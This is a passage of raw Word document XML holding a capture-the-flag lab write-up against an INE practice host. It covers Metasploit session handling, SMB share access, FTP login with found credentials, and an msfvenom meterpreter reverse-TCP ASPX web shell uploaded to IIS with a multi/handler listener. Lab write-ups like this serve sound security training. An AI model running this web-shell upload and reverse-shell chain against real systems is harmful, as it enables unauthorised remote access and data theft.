                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D036C58" w14:textId="77777777" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r w:rsidRPr="000F69E3">
        <w:t>We have successfully compromised the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F69E3">
        <w:t>nancy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F69E3">
        <w:t>’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1676ECBC" w14:textId="77777777" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t>To see the sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D12B6EE" w14:textId="121CBA0A" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7319C4A8" wp14:editId="69F613EE">
            <wp:extent cx="5677192" cy="1505027"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="210374631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6318" name="Picture 1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77192" cy="1505027"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="000F69E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B346E9B" w14:textId="77777777" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r w:rsidRPr="000F69E3">
        <w:t xml:space="preserve"> To interact with the session, use the following command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4DDA70" w14:textId="33DEC28F" w:rsidR="000303A3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r w:rsidRPr="000F69E3">
        <w:t>sessions 1</w:t>
      </w:r>
      <w:r>
        <w:t>/sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42C579" w14:textId="75FC4595" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A066A59" wp14:editId="042D8C8E">
            <wp:extent cx="4635738" cy="755689"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="854022509"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22509" name="Picture 11"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35738" cy="755689"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA0F93" w14:textId="26DB3414" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r w:rsidRPr="000F69E3">
        <w:t>list the shares available for the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F69E3">
        <w:t>nancy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F69E3">
        <w:t>’ user, use the command: shares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758B67D" w14:textId="527BD261" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7342AE33" wp14:editId="3C6C3A90">
            <wp:extent cx="4743694" cy="2381372"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34628258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82585" name="Picture 12"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743694" cy="2381372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CFF5E" w14:textId="1B1715BB" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r w:rsidRPr="000F69E3">
        <w:t>connect to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F69E3">
        <w:t>ITResources</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F69E3">
        <w:t> share by using the command: shares -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F69E3">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F69E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F69E3">
        <w:t>ITResources</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E73E735" w14:textId="1F5659D6" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E95310" w14:textId="0EE13F8C" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="724F8831" wp14:editId="33DFCCC3">
            <wp:extent cx="5747045" cy="3829247"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="164871331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13318" name="Picture 13"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47045" cy="3829247"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE394CA" w14:textId="1D742D25" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t>Download both flag and hint file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01E938" w14:textId="64684314" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EE23BCC" wp14:editId="42EF23C2">
            <wp:extent cx="4381725" cy="1155759"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="3457822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82273" name="Picture 345782273"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4381725" cy="1155759"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0997C520" w14:textId="77777777" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3"/>
    <w:p w14:paraId="60CA96BE" w14:textId="71EF14D4" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t>Cat flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E65854D" w14:textId="040C9757" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72168D83" wp14:editId="28C6B5B5">
            <wp:extent cx="3137061" cy="615982"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="475332621" name="Picture 1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32621" name="Picture 15" descr="A black background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37061" cy="615982"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18551B7D" w14:textId="2E4A1890" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F69E3">
        <w:t xml:space="preserve"> db17f19ce79e44fb9f668eaf42cdf92d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFC688" w14:textId="190BBE8D" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7299F91E" wp14:editId="11E36FCD">
            <wp:extent cx="3956253" cy="1054154"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1858427969" name="Picture 1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27969" name="Picture 17" descr="A black background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956253" cy="1054154"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55983909" w14:textId="69F6E228" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t>Cat hint.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55331B79" w14:textId="548CBC78" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36272B2D" wp14:editId="70A024F3">
            <wp:extent cx="5251720" cy="850944"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="786506162" name="Picture 1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06162" name="Picture 16" descr="A black background with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51720" cy="850944"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB24866" w14:textId="77777777" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3"/>
    <w:p w14:paraId="4483C094" w14:textId="77777777" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3"/>
    <w:p w14:paraId="60E6B92C" w14:textId="02404102" w:rsidR="002B4AEB" w:rsidRDefault="002B4AEB" w:rsidP="000303A3">
      <w:r w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4AEB">
        <w:t> I wonder what the hint found in the previous challenge be useful for!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C81267" w14:textId="77777777" w:rsidR="000303A3" w:rsidRPr="000303A3" w:rsidRDefault="000303A3" w:rsidP="000303A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000303A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3176E11F" w14:textId="129E7743" w:rsidR="000303A3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="000F69E3">
        <w:t>et’s try connecting to the FTP service using the credentials found in hint.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA7D1C" w14:textId="4E8C1C63" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t xml:space="preserve">Ftp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>target.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="130D1D8E" w14:textId="2F2D6029" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t xml:space="preserve">Provide the credentials </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the hint.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D16FA" w14:textId="316A9BA5" w:rsidR="000F69E3" w:rsidRDefault="00D4131F" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61E1C3C2" wp14:editId="39F6052C">
            <wp:extent cx="4216617" cy="1492327"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20089029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2974" name="Picture 2008902974"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4216617" cy="1492327"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BC2445" w14:textId="3DBF83E8" w:rsidR="000303A3" w:rsidRDefault="00D4131F" w:rsidP="000303A3">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697DEDD4" w14:textId="26433654" w:rsidR="00D4131F" w:rsidRDefault="00D4131F" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B87F0FB" wp14:editId="59D32BD3">
            <wp:extent cx="4845299" cy="1219263"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126015691"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5691" name="Picture 19"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845299" cy="1219263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA9E99" w14:textId="3D9C7678" w:rsidR="00D4131F" w:rsidRDefault="00D4131F" w:rsidP="000303A3">
      <w:r>
        <w:t>Get flag3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733959C6" w14:textId="0246E497" w:rsidR="00D4131F" w:rsidRDefault="00D4131F" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74BC1B71" wp14:editId="7872DF28">
            <wp:extent cx="3867349" cy="666784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1974649484" name="Picture 20"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49484" name="Picture 20" descr="A close up of a numb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867349" cy="666784"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="009DC8D4" w14:textId="14D16A0F" w:rsidR="00D4131F" w:rsidRDefault="00D4131F" w:rsidP="000303A3">
      <w:r>
        <w:t xml:space="preserve">Flag3= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4131F">
        <w:t>0b3e58da89274556ac1ac30d93d26d69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3180568A" w14:textId="33A9814D" w:rsidR="00D4131F" w:rsidRPr="002B4AEB" w:rsidRDefault="00D4131F" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08D2276A" wp14:editId="2711C1E3">
            <wp:extent cx="3880049" cy="692186"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="486147744" name="Picture 2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7744" name="Picture 21" descr="A black background with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880049" cy="692186"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5AA973" w14:textId="77777777" w:rsidR="002B4AEB" w:rsidRDefault="002B4AEB" w:rsidP="000303A3">
      <w:r w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4AEB">
        <w:t> Can you compromise the target machine and retrieve the </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C://flag4.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4AEB">
        <w:t> file?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16E167" w14:textId="77777777" w:rsidR="000303A3" w:rsidRPr="000303A3" w:rsidRDefault="000303A3" w:rsidP="000303A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000303A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D1F8EB" w14:textId="016C5443" w:rsidR="000303A3" w:rsidRDefault="00D4131F" w:rsidP="000303A3">
      <w:r w:rsidRPr="00D4131F">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4131F">
        <w:t>we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4131F">
        <w:t xml:space="preserve"> see that port 80 is open and we have FTP access. Enumeration shows that FTP is linked to this port, meaning any files uploaded will be reflected on the website. Since the server is running IIS, we can upload an ASPX shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38AB77" w14:textId="77777777" w:rsidR="000303A3" w:rsidRPr="002B4AEB" w:rsidRDefault="000303A3" w:rsidP="000303A3"/>
    <w:p w14:paraId="24F2D24B" w14:textId="65E480EA" w:rsidR="000303A3" w:rsidRDefault="00D4131F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4131F">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4131F">
        <w:t xml:space="preserve"> -p windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4131F">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4131F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4131F">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4131F">
        <w:t xml:space="preserve"> LHOST=10.10.40.2 LPORT=1234 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00225ECD">
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00225ECD">
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4131F">
        <w:t>shell.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71184C20" w14:textId="4AA7D86D" w:rsidR="000303A3" w:rsidRDefault="00225ECD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2426B4A0" wp14:editId="65D801F2">
            <wp:extent cx="5759746" cy="1517728"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1389625243" name="Picture 2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25243" name="Picture 22" descr="A screen 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59746" cy="1517728"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D592010" w14:textId="518E9985" w:rsidR="00225ECD" w:rsidRDefault="00225ECD">
      <w:r w:rsidRPr="00225ECD">
        <w:t>Upload the shell to FTP using the put command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64CD91" w14:textId="15D4D144" w:rsidR="00225ECD" w:rsidRDefault="00225ECD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="206CCA10" wp14:editId="319C3C5B">
            <wp:extent cx="5848651" cy="1263715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1198781481" name="Picture 2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81481" name="Picture 23" descr="A screen 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848651" cy="1263715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9372C" w14:textId="77777777" w:rsidR="00225ECD" w:rsidRDefault="00225ECD"/>
    <w:p w14:paraId="4E3CF0AF" w14:textId="386D067D" w:rsidR="00225ECD" w:rsidRDefault="00225ECD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225ECD">
        <w:lastRenderedPageBreak/>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225ECD">
        <w:t xml:space="preserve"> module /multi/handler to handle the incoming </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00225ECD">
        <w:t>connection.</w:t>
      </w:r>
      <w:r>
        <w:t>All</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the things must be</w:t>
      </w:r>
      <w:r w:rsidRPr="00225ECD">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225ECD">
        <w:t xml:space="preserve">configured </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00225ECD">
        <w:t>in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225ECD">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225ECD">
        <w:t> payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD1EED8" w14:textId="14AFD140" w:rsidR="00225ECD" w:rsidRDefault="00225ECD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37FB4224" wp14:editId="58391EB7">
            <wp:extent cx="5569236" cy="4521432"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2527602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60236" name="Picture 252760236"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5569236" cy="4521432"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10836237" w14:textId="1DE407FB" w:rsidR="00225ECD" w:rsidRDefault="00225ECD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="604109F9" wp14:editId="3FB50094">
            <wp:extent cx="5905804" cy="482625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="502659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5934" name="Picture 50265934"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5905804" cy="482625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30921617" w14:textId="7D96536C" w:rsidR="00225ECD" w:rsidRDefault="00225ECD">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56C1E9" w14:textId="77777777" w:rsidR="00225ECD" w:rsidRDefault="00225ECD"/>
    <w:p w14:paraId="13D6BE22" w14:textId="2AD10AA5" w:rsidR="00225ECD" w:rsidRDefault="00225ECD">
      <w:r w:rsidRPr="00225ECD">
        <w:t xml:space="preserve">Navigate to http://target.ine.local/shell.aspx in the browser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02810608" w14:textId="49DAFCA5" w:rsidR="00225ECD" w:rsidRDefault="00225ECD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="711B294B" wp14:editId="3653FABC">
            <wp:extent cx="5804198" cy="2781443"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="844055127"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55127" name="Picture 26"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804198" cy="2781443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB9B3A3" w14:textId="77777777" w:rsidR="00225ECD" w:rsidRDefault="00225ECD"/>
